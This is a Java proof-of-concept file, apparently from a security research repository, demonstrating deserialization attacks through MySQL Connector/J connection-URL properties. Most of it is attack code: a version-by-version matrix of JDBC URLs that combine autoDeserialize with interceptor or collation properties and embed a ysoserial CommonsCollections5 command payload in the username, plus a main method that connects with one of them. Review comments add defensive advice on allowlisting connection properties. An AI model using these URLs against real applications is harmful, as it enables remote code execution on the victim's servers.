forked from Whoopsunix/JavaRce
SerializeAttack.java
package mysql;
import java.sql.Connection;
import java.sql.DriverManager;
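/**
 * Deserialization through MySQL Connector/J connection-URL properties.
 *
 * <p>Driver artifact: https://mvnrepository.com/artifact/mysql/mysql-connector-java
 * <br>Reproduced against the lab server https://github.com/fnmsd/MySQL_Fake_Server
 *
 * <p>Every URL in {@link #main(String[])} sets {@code autoDeserialize=true} and, depending on
 * the driver range, {@code statementInterceptors}, {@code queryInterceptors} or
 * {@code detectCustomCollations}. The version ranges in the comments are the author's.
 *
 * <p>NOTE(review): for defenders the JDBC URL is a trust boundary. Code that assembles a URL
 * from untrusted input should pin the host and allowlist connection properties; the properties
 * named above are the ones to reject or alert on in configuration and logs.
 *
 * @author Whoopsunix
 */
public class SerializeAttack {

    /**
     * Opens one JDBC connection to {@code 127.0.0.1:3306} using the URL for the
     * 8.0.7-dmr – 8.0.19 range. The other URLs are kept as a reference matrix and are not used.
     *
     * @param args unused
     * @throws Exception if the driver class cannot be loaded or the connection fails
     */
    public static void main(String[] args) throws Exception {
        // Connector/J 5.1.1 – 5.1.10
        // Uses the statementInterceptors property.
        // Per the author, this range needs a query to be executed after connecting.
        // (Uncommenting also needs java.sql.PreparedStatement and java.sql.ResultSet imports.)
//        String serializeAttackURL_5_1_10 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
//        String username = "yso_CommonsCollections5_open -a Calculator.app";
//        String password = "";
//        Class.forName("com.mysql.jdbc.Driver");
//        Connection con = DriverManager.getConnection(serializeAttackURL_5_1_10, username, password);
//        String sql = "select database()";
//        PreparedStatement ps = con.prepareStatement(sql);
//        ResultSet resultSet = ps.executeQuery();

        // Connector/J 5.1.11 – 5.1.48
        // Uses the statementInterceptors property.
        String serializeAttackURL_5_11_48 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";

        // Connector/J 5.1.19 – 5.1.28
        // No interceptor property; only autoDeserialize is set.
        String serializeAttackURL_5_19_28 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&autoDeserialize=true&user=yso_CommonsCollections5_open -a Calculator.app";

        // Connector/J 5.1.29 – 5.1.40
        // Triggered through detectCustomCollations.
        String serializeAttackURL_5_29_40 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&detectCustomCollations=true&autoDeserialize=true&user=yso_CommonsCollections5_open -a Calculator.app";

        // Connector/J 6.0.2 – 6.0.6
        // statementInterceptors, with the interceptor class under the com.mysql.cj package.
        String serializeAttackURL_6 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";

        // Connector/J 8.0.7-dmr – 8.0.19
        // The URL uses queryInterceptors here, not statementInterceptors as in the older ranges.
        String serializeAttackURL_8_7_19 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";

        // Older driver versions need the driver class loaded explicitly.
        // NOTE(review): this is the legacy class name; the cj-based drivers name it
        // com.mysql.cj.jdbc.Driver. Confirm which one the driver on the classpath provides.
        String driver = "com.mysql.jdbc.Driver";
        Class.forName(driver);

        // Opening the connection is the whole demonstration; nothing is queried afterwards.
        // try-with-resources closes the connection instead of leaking it until JVM exit.
        try (Connection connection = DriverManager.getConnection(serializeAttackURL_8_7_19)) {
            // intentionally empty
        }
    }
}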